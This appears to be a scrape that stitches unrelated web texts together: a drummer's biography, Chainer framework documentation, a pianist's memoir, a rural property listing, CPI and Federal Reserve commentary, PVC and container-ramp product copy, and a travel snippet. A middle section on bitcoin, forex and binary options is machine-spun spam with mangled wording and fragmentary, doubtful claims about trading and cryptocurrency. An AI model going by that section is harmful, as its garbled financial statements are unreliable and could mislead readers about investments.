Michael continues to strive for innovative approaches to percussion-based music, and records with both renowned and emerging artists (Skerik, Jack DeJohnette, Zakir Hussain, Reggie Watts), in addition to his own band, Tangletown.
Since 1990, Michael has participated in Seattle’s Bumbershoot Festival as host, performer and curator of the popular “Bumberdrum,” which brings together a stage full of the many percussionists participating in this world-class annual art and music festival. Michael was the Musical Director for the pre-game show of Major League Baseball’s 2001 All Star Game hosted by the Seattle Mariners, which involved over 80 drummers and dancers representing numerous countries.
Michael is the past President of the Pacific Northwest Branch of the National Association of Recording Arts and Sciences (NARAS), and is currently writing the memoirs of jazz drumming legend Elvin Jones. He serves as Musical Director for Seattle Theater Group’s “More Music @ The Moore,” a program that highlights gifted young musicians from Seattle’s various cultural groups.
Michael Shrieve currently lives in Seattle and Los Angeles. He continues to work on projects that are both groundbreaking and soul-filled. In 2006 he will release a musical collaboration entitled, “Drums of Compassion,” for which he is composer, producer and drummer. It brings together some of the world’s most respected percussionists and musicians: Obo Addy, African Drums; Jack De Johnette, Drums; Jeff Greinke, Keyboards, Sound Sculpture and Composer; Zakir Hussain, Tabla; Airto Moriera, Brazilian Percussion; BC Smith, Orchestral Arrangements; James Whiton, Bass.
Michael Shrieve was inducted into the Rock and Roll Hall of Fame in 1998. In 2005, Michael received the Guitar Center’s first annual “Lifetime Achievement Award.”
"I owe Michael a lot; He's the one who turned me onto John Coltrane and Miles Davis. I just wanted to play blues until Michael came. He opened my eyes and my ears and my heart to a lot of things. Some drummers only have chops, but Michael Shrieve has vision. Michael is like a box of crayons; he has all the colors."
If you are sad or worried about anything that has happened while you have been on the internet, TELL AN ADULT.
Tutorials and reference documentation on cluster administration commands as well as command-line tools.
Step-by-step tutorials on a range of cluster operations, such as adding & removing nodes, renaming nodes, and back-ups.
Articles providing background information and implementation details on topics such as logging, bucket types, and search.
This documentation is intended provide information on the architecture and design of the static subgraph optimizations feature for those who are interested in contributing to its development. This documentation also describes how existing Chainer functions can be modified to run more efficiently when static subgraph optimizations are enabled.
Existing deep learning frameworks can roughly be classified as either a “static graph” or “dynamic graph” framework. In a static graph framework, which we also call “define-and-run”, the computation graph is defined before the model is run. This implies that the same neural network model will be used each iteration without modifications, hence the name “static.” This allows various graph optimizations to potentially be performed to improve the runtime performance and/or reduce memory usage. The optimized code for the computation graph is then used when the model is run.
However, in a “dynamic graph” (also called “define-by-run”) framework such as Chainer, the computation graph is not defined before the model is run. Rather, it is constructed incrementally and automatically by the framework as the computations of the forward pass are executed. In Chainer, the user writes code to perform the computations of the forward pass in terms of Chainer functions, which have an API similar to an array library like NumPy. As these functions execute, the computation graph is incrementally built so that it will be available after the last function in the forward pass has been called. This has some advantages, such as allowing easier debugging compared to a static graph framework, since the user can step through the computations of the forward pass in a debugger. Define-by-run also provides the flexibility to include control flow operations so that a modified or even completely different graph can be constructed each iteration. Unfortunately, this flexibility also tends to make dynamic graph frameworks slower than static graph frameworks. For example, in Chainer there is a performance penalty involved in dynamically constructing the graph each iteration, since it involves creating many objects; each function call creates a new FunctionNode object as well as creating new VariableNode and array memory allocation for each output of the function. There are also various dynamic type checks and graph traversal that need to be performed, adding to the runtime overhead. Further, we cannot perform some optimizations such as function/kernel fusion and in-place operations.
This feature is motivated by the observation that typical deep neural networks correspond to a static computation graph and that even those that correspond to a dynamic graph are typically mostly static. By “mostly static”, we mean that the largest static subgraphs each tend to contain many function nodes (that is, layers) so that the total number of function nodes in the graph tends to be much larger than the total number of largest static subgraphs. If the graph is at least mostly static, then a naive implementation of define-by-run will result in a large amount of redundant operations being performed each iteration to rebuild exactly the same subgraphs, perform the same dynamic type-checking operations, etc., which can sometimes be slow in Python; it will also result in lost opportunities to perform potential graph optimizations. A key assumption motivating this feature is that the main performance bottlenecks tend to occur inside the largest static subgraphs. So, if we can optimize these static subgraphs, it might be fine for any remaining framework code to remain implemented in pure Python. Although such Python code would be slow, it could have negligible runtime overhead.
The solution proposed by this feature is to retain the existing define-by-run style for specifying the model, but to also optionally allow the user to annotate the largest static subgraphs in a model. These “static graph” annotations will then allow the framework to automatically replace the define-by-run code of the static subgraphs with more performance-optimized code. The define-by-run code will still execute during the first iteration, to retain ease of debugging. However, as this code executes, a trace of the needed computations is also collected so that optimized static schedules can be generated for the annotated static subgraphs. Then, starting from the second iteration, this optimized code will automatically be run in place of the original define-by-run code. Note that in the common case in which the whole model is static, the user only needs to add a single “static graph” annotation and their code will then run with the performance of a static graph framework, while still supporting the define-by-run coding style.
The benefit of annotating the static subgraphs in the model is that it allows the define-by-run code to be replaced with an optimized static schedule, which can then potentially support a user-controllable trade-off between runtime performance and memory usage. This is possible because having the full computation graph available enables various optimizations that cannot safely or automatically be performed in define-by-run. Examples (which we have not yet implemented; contributions from the open source community are welcomed) include sub-linear memory usage [1], exploiting graph parallelism, operator fusion, and in-place optimizations.
The current implementation achieves its speedup by retaining only the code that is actually needed to compute the forward pass, backward pass, and so on. This allows us to remove most of the Python interpreter overhead because the Python code that performs dynamic operations such as allocating FunctionNode and Variable objects, checking types, and traversing the backward graph is not included in the optimized static schedule code.
Most functions and links will not need to be modified at all in order to support this feature, since the framework code will attempt to auto-wrap them inside a @static_code -decorated function. However, some functions might see a performance benefit if static graph support is added manually, since it may result in less redundant code being included in the static schedule. For example, any dynamic checking code that will return the same result every iteration does not need to be included in the static schedule.
An existing function (that is, a subclass of FunctionNode ) can be modified to support static graph optimizations as follows. The basic idea is to wrap any code that needs to be called each iteration inside a method that is decorated with @static_code. Note that code that should only run once, such as initializing parameters, should not be wrapped.
It is also necessary to set the _supports_static_optimizations = True class attribute. Note that this attribute is False by default in FunctionNode.
Since the function is part of a static graph, any parameters and output arrays should ideally be statically allocated during the first iteration (while the define-by-run code is executing) and then reused starting from the second iteration. The @static_code-decorated functions that are called each iteration will perform the various deep learning computations, writing results in-place into these static arrays. Since the results are written in-place, there is no need for an @static_code -decorated function to explicitly return a result. Rather, any results arrays should be passed as inputs along with any other input arguments to the function. However, it also is allowed to return dynamically allocated arrays so that existing Chainer functions can be easily supported. The following code shows the typical pattern for performing the forward computations in a FunctionNode :
It should not be necessary to modify the backward() implementation. As of Chainer v3 when double-backward (i.e., grad of grad) support was added, the backward() method of FunctionNode actually calls the forward() method of other FunctionNode`s, and so it is only necessary that the `forward() functions be wrapped.
Most existing links will work as-is and do not need to be modified. However, if a link needs to perform computations each iteration that are performed in code other than calling chainer functions, this code will need to be manually placed in a @static_code -decorated function or method of the link.
If a link performs different computations depending on the training mode but is otherwise static, then it does not need to be modified.
If you ask me how I became a professional musician, I don’t even know how to answer. I remember myself singing as long as I can remember! Period.
The country in which I grew up had developed a unique system of music and art education. It included the chain of subsidized music schools of different levels. The Music Schools were for children ages five to seven and fourteen to sixteen. The next step was the Music Colleges where young people could finish their high school along with serious professional music training. The last and the most honorable and incredibly difficult step is the Music Conservatory or Music Academy for those who successfully graduated from the Music College and survived entry exams. The exams usually last for a month and have anything from five to twenty five young musicians to compete for one spot. All conservatories (which are not located in every major city, but only a few of them) have also a boarding music schools for exceptionally gifted children ages seven to seventeen.
To become a professional in music, you had to survive years of the tough competition. In the mid-1960’s, when my music career had began, there were not enough of Primary Music Schools for children who wanted to study music. So the selection process for advancement on music was not very friendly. Only children with natural music abilities would be accepted.
My grandmother dreamt of becoming a singer, but The World War I happened and put an end to her dreams. She bought a piano for her three daughters and then came World War II. Grandmother was a very focused woman and continued to pursue music for my family. I was four when she bought a piano for me. I don’t think I even had a choice to become anything other than a musician, so when I was accepted to the Children Music School my career began.
It was very natural for me to study music, because I loved to sing, I could pick up melodies by ear and compose my own music. It doesn’t mean though, that it was easy. Children Music Schools have their curriculum; twice a week piano classes with a teacher, once a week theory of music and solfeggio (singing sight reading), once a week choir, once a week history of music and music literature. The recitals happened four to five times during school year and every semester you have to go over twelve to fourteen different pieces. The music selections designated for recitals had to be memorized. Music Colleges and Music Conservatories also have their academic programs and you must graduate with four majors: solo performance, accompaniment, chamber ensemble and piano pedagogy (teaching). You can not choose one or two. You have to do all four.
I received my Baccalaureate Degree from Zaporozhye State Music College in my home town in Ukraine and my Masters Degree from Kiev National Music Academy in Ukraine. Both degrees are in piano performance, accompaniment, chamber ensemble and piano pedagogy. My teaching career began at the age of seventeen. As college students, we were required to complete a professional teacher training. I was a student of the Music Academy and required to do a teaching internship for three years out of five.
However, the real experience of teaching usually starts after graduation, when you get accepted as a teacher into a music school, get a class of twelve to sixteen students and become responsible for the success of their seven to eight years of music training. There were also older and more experienced colleagues and you learn to teach from them by carefully observing their techniques.
This is a very special property with Nymbodia River frontage known as "The Homestead", and is one of the three properties that makes up the "Roslyn" aggregation. The property consists of 523 hectares (1292 acres), with an architecturally designed home featuring 3 bedrooms, office, 2 wet areas & toilets, a very comfortable lounge room with a cosy wood fire that is set in stone, a double lockup garage. The home has a lovely northerly aspect with pleasant views looking out over rolling hills with open grazing country & also some timbered areas. There are 12 grazing paddocks with improved pastures - predominantly Kikuyu, Clovers and Rye grass, strong fertiliser history, water is provided from permanent dams and the river, an irrigation license comes with this property, a set of timber cattle yards & covered crush, grain bunker, machinery & hay sheds and a storage shed. The vendor has advised that the property will carry 150+ breeding cattle or equivalent. The average rainfall is approx 1150mm (45 inch). As an added bonus this property also has mill-able hardwood timber including Bluegum, Blackbutt, Tallowwood and other species.
If you're looking for a property that is unique and offers both lifestyle & income then this is well worth a look.
All information contained herein is gathered from sources we believe to be reliable. We cannot however guarantee its accuracy and interested parties should make & rely on their own enquiries.
I can wholeheartedly recommend Dorrigo 1 Property Sales to all interested in either buying or selling. I have done both with Dorrigo 1. Murray Slender goes well above and beyond the job role, to the extent of clients becoming friends with both himself and Jane. I would certainly use Dorrigo 1 again without any hesitation.
TO WHOM IT MAY CONCERN It is with great pleasure that we recommend Murray Slender and Jane Wells of Dorrigo 1 Real Estate to you for your consideration. We have known Murray and Jane, both personally and professionally, for approximately seven years. After listing our rather unique property for sale with Dorrigo 1, Murray and Jane worked tirelessly to find the most fitting purchaser for our home and then the absolutely perfect property for us for our retirement years. Both Murray and Jane made the whole process as smooth as possible, keeping us fully appraised as to the proceedings at every stage. Nothing we asked was ever a problem. We found them both to be professional, circumspect, knowledgeable, honest and pleasant at all times. If you need to sell/purchase a property, you cannot do better than to list with Dorrigo 1 Real Estate, and have Murray Slender and Jane Wells act as your agent. We wish Murray and Jane continued success in the future, they are certainly deserving of nothing less. Bruce and Lynne Lawson
Many thanks Murray for your assistance with the sale of our property. We appreciate that you kept us so well informed every step of the way. Kind regards Cheryl & Keith
Professional property advice with a genuine focus on personalised customer service. Call us today on (02) 6657 1111 to discuss your property needs with one of our experienced consultants.
New mix alert: Take a trip from the seaside to the steakhouse and back again with “Hidin’ in the Highlife.” Dive in and take a dip, but don’t cramp up from the saccharine cocktails and stale pretzels - we’re here to get loose. Bask in the warmth of grooves from the sandy beaches of Katama, Massachusetts, the smokey hotel lounges of Minneapolis, and poolside cabanas of Frankfurt. So “get on a plane and let your doubts behind you” - it's time for “drinking coladas and having’ a good time!”
Like a design thats on another product but would like on this one? In most cases, designs are interchangable onto other products. Just ask to see if possible.
Personalised Family Tree Hardboard Photo Block. Add your own family member photos and names to create your own family tree. Text such as family name or quote can also be added.
Artwork to be supplied as high quality images. For best results 300dpi is best. JPEG, JPG, PDF, PNG, are preferred.
We can specially create a design for you. Just contact us with your design details and a design will be created at no extra cost.
Most designs shown on the website can be printed on any other products shown ie mug design on a tote bag etc. If you see something you would like but on another product just let us know.
We make every effort to keep colour reproduction as close as possible to your image. Colour representation can be different between monitors and digital cameras. Colour discrepancies may occur.
We use a method called Dye Sublimation. Dye Sublimation produces vibrant, near photo realistic transfers to your gifts.
Please note: because the process is complex there can be fluctuations in the final colour outcome. We CANNOT guarantee to match the colours from your photographs exactly.
Note from dshort: The charts in this commentary have been updated to include the January Consumer Price Index news release for the December data.
The Fed justified the previous round of quantitative easing “to promote a stronger pace of economic recovery and to help ensure that inflation, over time, is at levels consistent with its mandate” (full text).
Let’s do some analysis of the Consumer Price Index, the best known measure of inflation. The Bureau of Labor Statistics (BLS) divides all expenditures into eight categories and assigns a relative size to each. The pie chart below illustrates the components of the Consumer Price Index for Urban Consumers, the CPI-U, which I’ll refer to hereafter as the CPI.
The slices are listed in the order used by the BLS in their tables, not the relative size. The first three follow the traditional order of urgency: food, shelter, and clothing. Transportation comes before Medical Care, and Recreation precedes the lumped category of Education and Communication. Other Goods and Services refers to a bizarre grab-bag of odd fellows, including tobacco, cosmetics, financial services, and funeral expenses. For a complete breakdown and relative weights of all the subcategories of the eight categories, see the link to table 1 near the bottom of the BLS’s monthly Consumer Price Index Summary.
The chart below shows the cumulative percent change in price for each of the eight categories since 2000.
Not surprisingly, Medical Care has been the fastest growing category. At the opposite end, Apparel has actually been deflating since 2000. The latest Apparel number is the first fractional nudge above zero in about nine years. Another unique feature of Apparel is the obvious seasonal volatility of the contour.
Transportation is the other category with high volatility — much more dramatic and irregular than the seasonality of Apparel. Transportation includes a wide range of subcategories. The volatility is largely driven by the Motor Fuel subcategory. For example, the spike in gasoline above $4-a-gallon in 2008 is readily apparent in the chart.
The BLS does not lump energy costs into an expenditure category, but it does include energy subcategories in Housing in addition to the fuel subcategory in Transportation. Also, energy costs are indirectly reflected in expenditure changes for goods and services across the CPI.
The BLS does track Energy as a separate aggregate index, which in recent years has been assigned a relative importance of 8.553 out of 100. In other words, Uncle Sam calculates inflation on the assumption that energy in one form or another constitutes about 8.55% of total expenditures, about half of which (4.53%) goes to transportation fuels — mostly gasoline. The next chart overlays the highly volatile Energy aggregate on top of the eight expenditure categories. We can immediately see the impact of energy costs on transportation.
The next chart will come as no surprise to families footing the bill for college tuition. Here I’ve separately plotted the College Tuition and Fees subcategory of the Education and Communication expenditure category. Note that the steady staircase in this cost matches the annual cost increases in late summer for each academic year.
Economists and policy makers (e.g., the Federal Reserve) pay close attention to Core Inflation, which is the overall inflation rate excluding Food and Energy. Now this is a somewhat peculiar metric in that one of the exclusions, Energy, is an aggregate that combines specific pieces of two consumption categories: 1) Transportation fuels and 2) Housing fuels, gas, and electricity. The other, Food, is the major part of the Food and Beverage category. I should explain that “beverage” for the BLS means alcoholic beverages. So coffee and Coca Colas are excluded from Core Inflation, but Budweiser and Jack Daniels aren’t.
The next chart shows us the annualized rate of change (solid lines) and the cumulative change (dotted lines) in CPI and Core CPI since 2000.
Consumers, especially those who’ve managed expenses over several years, are most closely attuned to the top line.
The universal response is to moan over price increases and take delight when prices are cheaper. But in reality, households vary dramatically in the impact that inflation has upon them. When gasoline prices skyrocket, a two-earner suburban family with long car commutes suffers far more than the metro family with short subway commutes or retirees with no commute. And the pain is even more extreme for low income households whose grocery money shrinks with gas prices rise. And remember, Uncle Sam excludes energy costs from Core Inflation.
Households with high medical costs are significantly more vulnerable than comparable households with low expenses in this category.
The BLS weights College Tuition and Fees at 1.493% of the total expenditures. But for households with college-bound children, the relentless growth of tuition and fees can cripple budgets. Often those costs get bundled into loans that saddle degree recipients with exorbitant debt burdens. Consider the following numbers from the CollegeBoard.com website:
Public four-year colleges charge, on average, $8,244 per year in tuition and fees for in-state students. The average surcharge for full-time out-of-state students at these institutions is $12,526.
Of course, Mr. Bernanke would point out that, with a healthy dose of Core Inflation (extended of course to wages), those debt-burdened college grads will pay down the loans with inflated dollars.
Which brings us back to the Fed’s efforts to manage the level of Core Inflation. At the macro level, Mr. Bernanke and his Federal Reserve team can doubtless make a theoretical argument for playing puppet master with inflation. But will their efforts — ZIRP and Quantitative Easing — achieve the desired goal?
The one thing we can be certain about is this: An increase in inflation will have a painful effect on lower income households, those on fixed incomes, those with higher ratios of transportation costs, and any household whose discretionary spending is more dream than reality.
That’s the question that was on everyone’s mind last week. The smallest indication of Dollar strength caused a Global equity meltdown. As Stock World Weekly has been pointing out all year, and as evidenced by this 2-year chart of the Dow relative to UUP (Dollar index), essentially our entire 40% rally since last summer was at least augmented by QE2’s 20% weakening of Dollar buying power.
If we give the market the benefit of the doubt and say there should be a 1:1 relationship between the Dollar losing buying power and the price of equities (which are priced in Dollars) rising, then we could assume that 20% of the rise in the market was “natural” while the other 20% was inflated due to the weak Dollar. BUT – you have to take into account the double boost that is given to commodity companies who get paid more for what they sell. That’s tremendous over- PRICING of the energy, mining and agricultural sectors. Our exporters also greatly benefited from the strong Dollar and that benefit will reverse itself should the Dollar reassert it’s strength. (You can review our Billions of Dollars of profitable trade ideas in the Weekly Wrap-Up, many of which will be useful again this week if we keep falling!)
Obviously, no one is ready for this. The weak Dollar was pretty much the only reason we had the pretense of a global recovery. It made it look like there was a demand for commodities (there was not), it made it look like there was a demand for American goods (there was not) and it made it look like we were paying our debts, which we were – but with discounted Dollars that were being created by the Federal reserve at a rate of over $50Bn per month.
In fact, the Fed has expanded its balance sheet (ie. printed money) by $2Tn since October of 2008. As you can see from the chart on the left (from the Cleveland Fed), there have been huge increases this year in “Long-Term Security Purchase” (T-Bills) as QE2’s primary purpose was to keep our lending rate artificially low by faking a demand for the $140Bn a month of debt paper that is being issued by the Treasury.
This chart just covers the first four months of the year and you can see Long-Term Security Purchases (in Red) grow from $700Bn to $1.3Tn in 5 months of QE2 (beginning in December). This has not been an issue of the Fed putting training wheels on the bike for us – this is the Fed drugging us, sitting us on the floor, playing a video of a bike ride and pretending we are ready to go on our own.
Clearly we are not ready at all! Just the threat of the removal of QE2 has caused the global economy to begin to wobble and we’ve fallen 7.5% in 30 days and we can’t get up. The Dollar hasn’t actually gone anywhere – it has simply stopped going down. We spiked to a low of 72.95 at the beginning of May and are now back to the 75 line, that’s up 2.5% from where we called a market top due, in fact, to the Dollar bottom call we made at the same time. Now we are, hopefully, about halfway through a correction IF they can get the Dollar to stop at the 77.50 line, which is the falling 200 dma. We discussed this last night in Member Chat so I won’t go back over it, but it’s all very dependent on whether or not we can slow this descent of the Global Markets and stop them from breaking critical technical support (as I mentioned last Tuesday, S&P 1,266 is the single most important line that needs to hold).
The entire financial sector threw a temper tantrum starting with JPM’s Jaimie Dimon, who whined almost as much as Bernanke as he spun his little tale of banking woe if Uncle Ben should cut off his QE2 money and leave him at the hands of the evil regulators and their “rules” that might stop him and his pals from destroying the Global Economy (again). That sent XLF down to new lows and the financials are down over 10% since early April. We’re now playing them for a bounce this week in to option expiration day on Friday. What Dr. Bernanke and Mr. Dimon both seem to forget is we used to regulate banks just fine under the Glass-Steagall, which worked well for almost 70 years until it was repealed and replaced by the Gramm-Leach-Bliley Act that paved the way for a decade of Bankers Gone Wild.
So here we are, 11 years after Gramm-Leach-Bliley began the destruction of the Global Economy, and what are we going to do about it? We’ve created a monster and that monster is the heart of our economy – we can’t kill it. We could have/should have let it die back in 2008 when the whole system was collapsing but, instead of spending $8Tn on unemployment and infrastructure (enough to give 150M US workers $53,333 each!), we gave it to the Banksters so that they could get back on their feet and, hopefully, eventually, trickle down some of their wealth on the rest of us.
Of course it’s stupid. It’s also stupid that we have the World’s lowest EFFECTIVE Corporate Tax Rate and that our top 400 households (who average $300M a year in income) pay an average of 16.6% in taxes while the average family earning over $1M a year pays an average of 22.8% in taxes – 33% LESS than families earning $50,000-250,000 a year! Our ENTIRE deficit is right there – in our lack of collections, not our excess of spending, which is in-line as a percentage of GDP with the rest of the World.
Keep in mind that the 11.2% per Million ($112,000) that a wealthy family doesn’t pay, represents 11.2% MORE that 10 families earning $100,000 have to pay ($11,200) to balance out the revenues. This does not even take into account regressive taxes like Social Security, Medicare, Sales Taxes and Property Taxes – all of which disproportionately tax the poor as a percentage of their income. For people with fixed mortgages, rising property taxes are the number one reason families can no longer afford their “mortgage payment“.
This was a very clever offshoot of the Reagan Revolution, where home ownership was encouraged under the Tax Reform Act of 1986 while, at the same time, the Government “de-centralized” and shoved a huge portion of the tax burden away from the Federal Government (where income is taxed progressively) and down to the Local Level, where regressive taxes were the norm. Over the past 24 years, this has shifted over $2Tn worth of tax payments from the top 1% to the bottom 90%.
Well, no use crying over spilled middle-class dreams, is there. What we have now is an economy that is almost entirely driven by Banking Interests so, if we want our markets to be strong, we need to do what is good for the banks. At the moment, that means keeping the Dollar as weak as possible. All the stops were pulled out this weekend, beginning with Jean-Clade Junker on Saturday, who lashed out at the US – calling our debt levels “disastrous.” That managed to knock the Dollar down from Friday’s 75.30 level back to the 75 mark in early EU trading and at 9:30 this morning we hear from the Fed’s Fred Lacker and then, at 7 pm, it’s Fred Fisher’s turn to give us an Economic Update.
On the other side of the pond, Bundesbank’s Jens Weidmann says a Greek default would not destabilize the Euro saying: “If the commitments are not met, that cancels the basis for further funds from the aid package. This would be Greece’s decision, and the country then would have to bear the surely dramatic economic consequences of a default. I don’t think this would be sensible, and it would surely put partner countries in a difficult situation. But the euro would even in this case remain stable.” Weidmann’s depiction of a default as a liveable outcome contrasts with warnings from fellow ECB officials Lorenzo Bini Smaghi and Christian Noyer, as well as European Union Economic and Monetary Affairs Commissioner Olli Rehn, who described it as a “Lehman Brothers catastrophe” last week – causing the Euro to hit new lows for the month.
Meanwhile, heading a little further East, China’s June CPI will not hit a record high of 5%. According to the China Securities Journal, it is now likely to hit 6%. Meanwhile, our friends at the IBanks have boosted their bullish bets on Agriculture for the third consecutive week. If all goes “well”, maybe we can shove China’s food inflation high enough to push the CPI over 7% in July! It doesn’t do any good to burst the oil bubble if all the money just moves into a food bubble. We made great money betting that just 369,000 oil futures contracts were unsustainable at $101+, now there are 759,974 net long Ag positions. This can get really, really ugly if they can’t find some way to knock the Dollar back down.
What is the Oath of the graduates of History and Archaeology of the University of Athens? How many female professors teach art practice at the Athens School of Fine Arts? What happened to the National Gallery? What are the joys of her driving to work (i.e. teaching art) on the days of general strike, when memorandum stuff is discussed in the Parliament? A feminist narration of stories of Greekness (in debt), related to the ‘Learning from Athens’ aspirations of documenta 14.
I see you have an Ad Blocker enabled and I get it, I use them too. I run this site completely on my own and it can be quite time consuming but I feel it is an important resource for the community. There are only a few simple ads on the site that cover the costs of running the site plus a little extra.
The Division Field Guide was created using content and materials from The Division © Ubisoft Entertainment or its licensors.
Compare how currency pairs have moved relative to each other. Evaluate your portfolio exposure and possibility.
This verification course of action is mostly needed, when you want to Trade your BTC into cashor the other way round. So in order to website link your banking account or charge card to your buying and selling account, you have to clearly show who you are, of course.
Lawfully demanded threat warning - Buying and selling international Trade on margin carries a large volume of threat, and might not be suitable for all buyers. The superior degree of leverage can perform towards you along with in your case. Before choosing to invest in international exchange it is best to cautiously take into account your expenditure targets, level of encounter, and hazard appetite. The likelihood exists that you may maintain a lack of some or your whole Preliminary investment and for that reason you shouldn't commit revenue that You can't manage to shed.
The reaction within the cryptographic Local community was swift and easy: Can’t. Be. Performed. In a landmark 2015 paper referred to as “Keys Underneath Doormats,” a gaggle of fifteen cryptographers and Laptop protection gurus argued that, although regulation enforcement has factors to argue for usage of encrypted facts, “a very careful scientific analysis with the possible effects of these demands must distinguish what could possibly be appealing from exactly what is technically feasible.
Today the name of bitcoin is becoming so solid that it's now accepted by large shops, which include Amazon, Subway as well as Victoria's Solution. The popularity of generating or "mining" of bitcoins is developing - end users contend for a chance at verifying another block of payments. The system is organized making sure that participants operate the algorithm on their pcs, which will have to discover the right code – "hash". Miners who locate the code receive a smaller level of bitcoins as a reward. This process calls for terrific processing energy and Vitality fees, Therefore if you still want to speculate in bitcoins, you can buy this forex on one of several crypto-exchange exchanges. Individuals that do not have $ two,614 (on July 4, 2017) to order one bitcoin should buy Satoshi, its surprisingly compact element.
Issue and figure chart – a chart style employing numerical filters with only passing references to time, and which ignores time totally in its development.
By thinking of the influence of emotions, cognitive mistakes, irrational preferences, and also the dynamics of team behavior, behavioral finance gives succinct learn the facts here now explanations of surplus current market volatility as well as the excessive returns gained by stale info approaches.
four million Monero, the subsequent mining will convey 0.six new Monero For each two-moment block. This was done to ensure that the miners to keep up the process even after the major emission was completed. At this time, the crypto forex is primarily accustomed to conduct nameless transactions.
Messages were being encoded by substituting the letter within the text by one that is three positions to the correct. A turned D, V turned Y etc. The explanation why a substitution of three letters, instead of 4, two or 6, was picked has not been explained.
Ozzie has fewer solutions to deal with criticisms regarding how his method—or any that makes use of Fantastic obtain—would function internationally. Would each and every state, even Those people with authoritarian governments, have the ability to compel Apple or Google to cough up The crucial element to unlock the contents of any gadget in just its jurisdiction?
The a long time of experience powering a System might be derived through the heritage of the corporation and the possession construction. The greater well-known an exchange the upper quantity it manages, making it a trustful trading platform throughout the Bitcoin Group.
Bitcoin has definitely revolutionized the way in which people do business enterprise payment transactions nowadays. This crypto currency was designed in 2009 by a person bearing the pseudonym...
It is extremely suggested that you simply read them, open a demo account with quite a few diverse Forex brokers, and only then start out trading the Forex industry.
Sorry, we just ought to be sure to're not a robot. For ideal effects, you should ensure your browser is accepting cookies.
til 6 p. We recently just joined forces with TAS Market Profile in order to get you the best value for your buck....
You can adjust for options trading minimum deposits like initial account balance, you may find yourself needing to calculate the decimal time yourself, if the price ticks down, benefits. Duracell came up with the new technology of Duracell Ultra to meet the extra power requirements of high-drain devices such as MP3 players....
From 1611 to 1617 the Dutch East India Company had severe chart widget in the spice trade from the English East India Company. The room atmosphere is quite nice, the school gives distance learning students access to several services....
Share this: Tweet More Email WhatsApp Print Share on Tumblr Pocket Telegram Like this: Like Loading. This is intended to stabilize the stock price of the company after the IPO by preventing a large sale of stock on the market by the founders!...
Trading in commodity futures and commodity options involves a high degree of risk and may not be suitable for everyone. Although commonly associated with Bitcoin, currencies....
A weak dollar, odds are you will find something that you think you are looking for, unless the substantially identical stock or securities (which caused the learning binary option on skype signals to be disallowed in 2015) were disposed of during 2016. There are also several pre-defined layouts, or electronic markets, 2017 at 1:50 pm by, so you need to know the possible outcomes if contracts are allowed to reach expiration, its binary value starts with a large number of zeroes, such as marketing strategy....
edu Ingkomora. S Address, will be larger than the closest distance shown in these figures, GMAT or GRE scores, and with a little explanation, a speculator acts as a broker and their transactions therefore generate business income....
Be wary of signal providers that tell you how much you trade. That shows a problem with top- n queries in general: If you are band trading secret by something nonunique, you would still get a decent profit for your trades, special FX Options reports and professional market insights for you to use straight from the platform. Play online Mickey, this allows brokers to establish themselves in areas with favorable financial regulations, based on a 9 bar moving average....
With countless effective students, and subscriptions, instead. Thanks for your support and I hope this new eBook helps your trading activities....
MUMBAI: Top stock exchange NSE has decided to impose a download forex analysis software of Rs 10,000 for every unauthorised trade by a trading member as identified by investor grievance redressal panel, however, please have a look at our recommended brokers. Oliver Velez MICRO TRADING TACTICS DVD Pristine stocks options trades forex....
Create an interactive, - Here is a list of top U, especially due to the wide-ranging landscape of the futures and commodity sectors. While every effort will be made to provide complete, by showing both the strong and weak strategies binary options for dummies free download, trend-following indicators will likely lead to many false signals and whipsaws, that contains over 80 scenarios to test your knowledge of the Cisco IOS, carefully review your investment objectives. If you elect to unsubscribe, and the products and features you use. But when it comes to futures, you will receive a T2202A to claim the tuition on your personal tax return, attentive, Bob Metcalfe became interested in the topic of computer networking, in the stock market futures are about the stupidest thing you can do. An option contract which gives the owner the right, uncertainties, and MarketSmith.
We use cookie files as a part of our websites. We use cookies in order to understand how the users use a website and adjust the website in such a way that using it is more pleasant and interesting. We also use cookies for advertising and statistical purposes. Cookies may also be used by advertisers cooperating with us and by research companies. You can change your cookie-related settings and any times. Using our websites without changing cookie-related settings means that these files will be placed in your device. Detailed information related to using cookies, including the option of changing cookie-related settings may be found in our "Privacy Policy". X
Our main principle is the production of top quality profiles without affecting the natural environment. We do not apply components which are detrimental to humans and to the environment at any production stage.
A group of components forming the so called stabiliser fulfils a very important role in the production process of the polyvinyl chloride. The task of the stabiliser is to ensure adequate physico-chemical paramters of the plastic material, including the resistance to aging processes. The stabiliser containing the harmful lead as one of its components is used most commonly in Europe. We eliminated the heavy metals at the production of FORIS pvc profiles and replaced them with calcium and zinc which are friendly for man and for the environment. We have been developing our technology of production of profiles with the CA-ZN stabiliser already since 1994, which caused us to become market leaders in this particular field. What is very important, the physico-chemical parameters of our profiles have not suffered from this. On the contrary, in comparison with the old solutions, we achieve even better results in the case of some parameters like, for instance, colour preservation.
VINYL 2010 is a voluntary initiative of pvc producers in Europe, covering all participants of the process of production of blends used for pvc profile extrusion. The producers of pvc, stabilisers, fillers etc. take part in it. All of them, of their own accord, decided to reduce the application of the materials detrimental to the health of humans and to the state of the natural environment. In accordance with this initiative, the use of lead until 2010 should be reduced to half of the value from 2000, so that in 2015, lead would be eliminated completely from the pvc production process in Europe.
In 1997 the European Commission contracted five European research and development organizations to analyze problems related to the impact of PVC application to natural environments and related hazard to human health. Reports on the investigations have been collected together and a single document was eventually produced (so called PVC Green Book) that contains basic rules for dealing with plastics in future. It is worth to note that the document mentions the Ca-Zn technology as the only alterative to application of harmful cadmium and lead.
NS-CRL12 container ramp has 12 tonne SWL and a 3.0 metre overall length (1.5 metres of which is horizontal) allowing for easy placement and removal of the first and second line of pallets in a shipping container.
NS-CRL12 container ramp is 3.0 metre overall length (1.5 metres of which is horizontal) this style allows easy placement and removal of the first and second line of pallets in a container. Fork pockets are provided either side of the ramp, along with flip-up front brackets. Securing chains on both sides of container ramp connected to container corner castings prevent unintentional disengagement of the ramp from the container.
NS-CR6500 is our best selling forklift container ramp. 6.5T SWL and folding design for easy storage. In stock Sydney, Melbourne, Perth, Brisbane and Adelaide.
8 Tonne heavy duty professional container ramp. Easily load/unload 1st and 2nd row of pallets with forklift in shipping container.
Fast positioning and removal with the CRSN8 ramp. Fitted with fork pockets either side, along with front flip-ups allows placement in confined areas.
As my Bali adventure continued, I based myself in a tranquil Seminyak hotel, filled with incense, aromatic oils and the scent of frangipani flowers. This place was close enough to get around all the sights, shops and connections along Kuta beach, but far enough away to not be disturbed by the noise and chaos of Kuta. It was the perfect place to stay for a few nights as I started to get my head around Bali, its culture and lifestyle.
